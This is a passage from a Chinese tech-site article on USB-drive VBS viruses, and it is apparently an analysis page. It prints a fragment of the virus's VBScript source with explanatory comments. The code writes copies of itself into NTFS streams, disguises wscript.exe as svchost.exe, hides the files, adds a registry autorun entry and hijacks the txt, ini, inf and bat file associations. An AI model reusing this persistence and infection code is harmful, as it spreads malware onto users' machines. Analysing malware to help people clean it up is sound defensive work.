u盘中了vbs病毒怎么办_u盘vbs病毒杀不干净_vbs病毒(4)

End If

Next

If FSO.FileExists(VirusAssPath)=False OrFSO.FileExists(VirusLoadPath)=False OrFSO.FileExists(HostFilePath)=False Or GetVersion()< VersionThen

If GetFileSystemType(GetSystemDrive())='NTFS' Then'NTFS格式

Call CreateFile(VirusCode,VirusAssPath)

Call CreateFile(VirusCode,VirusLoadPath)'这一步创建了流文件

CallCopyFile(HostSourcePath,HostFilePath)'这一步将wscript.exe从system32复制到system目录并改名svchost.exe

Call SetHiddenAttr(HostFilePath)

Else'FAT32格式

Call CreateFile(VirusCode, VirusAssPath)

Call SetHiddenAttr(VirusAssPath)

Call CreateFile(VirusCode,VirusLoadPath)

Call SetHiddenAttr(VirusLoadPath)

Call CopyFile(HostSourcePath, HostFilePath)

Call SetHiddenAttr(HostFilePath)

End If

End If

If ReadReg(HCULoad)<>Load_ValueThen'改写注册表启动项，smss.exe的流

Call WriteReg (HCULoad, Load_Value, '')

End If

If GetVersion() < Version Then'改写版本信息为1

Call WriteReg (HCUVer, Version, '')

End If

If GetInfectedDate() = '' Then

Call WriteReg (HCUDate, Date, '')'记录感染时间

End If

'以下更改许多文件关联,病毒的通用感染方式

IfReadReg('HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\')<>File_ValueThen

Call SetTxtFileAss(VirusAssPath)

End If

IfReadReg('HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\')<>File_ValueThen

Call SetIniFileAss(VirusAssPath)

End If

IfReadReg('HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\')<>File_ValueThen

Call SetInfFileAss(VirusAssPath)

End If

IfReadReg('HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\')<>File_ValueThen

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-25802-4.html